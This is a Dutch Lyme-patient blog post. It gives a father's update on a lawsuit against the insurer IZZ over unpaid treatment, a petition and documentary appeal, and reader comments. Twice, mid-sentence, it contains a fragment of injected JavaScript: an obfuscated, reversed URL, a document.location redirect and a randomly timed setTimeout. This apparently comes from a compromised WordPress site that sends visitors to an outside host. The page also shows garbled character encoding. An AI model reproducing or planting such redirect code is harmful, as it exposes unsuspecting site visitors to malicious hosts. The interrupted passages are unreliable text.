Informatief Lyme Awareness Overig

IZZ krijgt uitstel- een column van mijn vader, informatie petitie en documentaire en meer.

Column van mijn vader

In mijn vorige column schreef ik dat Marleen en ik IZZ hebben gedagvaard. Dit omdat de zorgverzekeraar van Marleen botweg weigert de door haar ondergane Lyme-behandeling te betalen. Ik zou op deze plaats een update geven indien er een resultaat te melden was.

RECHTZAAK TEGEN ZORGVERZEKERAAR IZZ – EEN KORTE UPDATE

Helaas heeft IZZ besloten in de vertraagstand te gaan.
Zo hadden ze op de rolzitting van 23 november nog geen verweer klaar. Voor dit schriftelijke verweer op onze dagvaarding heeft IZZ daarom van de rechtbank uitstel gekregen toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot de rolzitting van afgelopen woensdag.
Wat bleek woensdag? Het door IZZ nu wel aan de rechtbank aangeleverde materiaal is onvolledig. De griffier had uitsluitend een aantal bijlagen ontvangen, maar niet het verweerschrift.

Nogmaals uitstel voor IZZ

De rechter heeft nogmaals uitstel verleend. Zij hebben nu de tijd om uiterlijk 4 januari het definitieve verweer in te dienen. Mmmm. Wel de bijlagen bij het verweerschrift, maar niet het verweerschrift zelf. Op zijn minst opmerkelijk.
Wel de plaatjes, maar niet het verhaal.
Optimistisch als ik ben hou ik het er op dat de juristen de grootste moeite hebben om het verhaal te schrijven.
Met andere woorden, om er een zo deugdelijk verhaal van te maken dat dit alle punten van onze dagvaarding overtuigend weerlegt.
Op die manier bezien geeft dit hoop ūüôā

IZZ Jurist

Helaas heeft de Lymevereniging vorige week besloten om ons verzoek toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot financi√ęle ondersteuning in deze rechtsfase niet te honoreren. De NVLP ondersteunt slechts een eventueel hoger beroep. Wordt vervolgd…..

(plaatje:  een IZZ jurist die het even niet meer ziet zitten)

Nog even persoonlijk!

Het is hier een beetje stil de laatste tijd en daar zijn verschillende redenen voor. Ik probeer voor de jaarwisseling een blog online te zetten, waarin ik hier meer over zal gaan vertellen.  Ook zal ik, net als vorig jaar, terug gaan blikken op wat het afgelopen jaar gebracht heeft. En ik ga vooruitkijken en doelen stellen voor het nieuwe jaar. Iets wat ik vorig jaar nog niet aandurfde. Wil je weten wat die doelen zijn? Hou dan deze site in de gaten of volg mij op Facebook. Voor wie het leuk vind om mij te volgen: ik maak nog steeds korte filmpjes op Snapchat en Instagram (gebruikersnaam voor beide accounts: marleen.mg)

Voor Snapchat kan je ook de onderstaande snapcode gebruiken!

Snapcode

Over de petitie, de documentaire en de campagne

Zouden jullie de petitie willen ondertekenen voor andere richtlijnen voor de behandeling van de ziekte van Lyme? Dat zou zoveel voor mij en andere Lyme patienten betekenen. En het is in 2 minuutjes gedaan!

Zie hieronder het filmpje van acteur en musicalster Miro Kloosterman. Hierin vertelt hij kort over de petitie en over de documentaire die momenteel in de maak is.

In de documentaire¬†zal er aandacht worden besteed¬†aan de huidige stand van zaken en het gebrek aan kennis over Lyme binnen de zorg. Niet alleen pati√ęnten komen in beeld, ook deskundigen uit binnen- en buitenland zullen hun visie geven op de Lyme problematiek.

‚ÄúS.O.S. Een onzichtbare epidemie‚ÄĚ zal gemaakt worden door de Nederlandse documentaire maker Pim Giel en gaat in op de ernst van de ziekte van Lyme zoals verlamming, blindheid, pijn, maar ook over de gevolgen ervan zoals, uithuisplaatsing, vermeende kindermishandeling, euthanasie, uitkeringsproblematiek en misdiagnostiek.

Voor de documentaire en de campagne die gevoerd gaat worden, worden er donateurs gezocht. Wilt u doneren dan kan dat via de website van de documentaire.

Help je ook mee?

Facebook reacties

5 Reacties

 • Reply
  Pauline Rademaker Schoordijk
  23 december 2016 at 07:57

  Pfff lijkt wel een gebed zonder end ik hoop dat die 2 x uitstel voor hun in jullie voordeel gaat werken uiteindelijk
  Wel ontzettend jammer dat de NLVP deze rechtsgang niet wil ondersteunen ik denk dat dat ook voor hun een gemiste kans is ….
  En hoop dat jullie door middel van crowdfunding oid toch wat ondersteuning bij elkaar kunnen sprokkelen .Succes

  • Reply
   Lyme leven - van Marleen
   23 december 2016 at 09:48

   Ik vermoed dat het nog heeeeel veel langer gaat duren helaas. Maar dat wisten we van te voren, dus daar zijn we op ingesteld. Lange adem nodig maar hopelijk met uiteindelijk een goed resultaat!

  • Reply
   Pauline Rademaker Schoordijk
   23 december 2016 at 10:09

   Ik blijf heeeeel hard duimen

  • Reply
   Karin van Wijgerden
   23 december 2016 at 12:12

   Het helpt nix, dat weet ik, maar ook ik heb een heel lange adem nodig bij de instanties in Frankrijk. Sterkte, hou vol. Samen staan we sterk.

 • Reply
  lucas de Groot
  7 maart 2017 at 19:16

  Nou zeg, wat goed van jullie allen om dit proces aan te gaan.
  Hoe kan ik financieel ondersteunen?

  Lucas

 • Leave a Reply

  Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

  %d bloggers liken dit: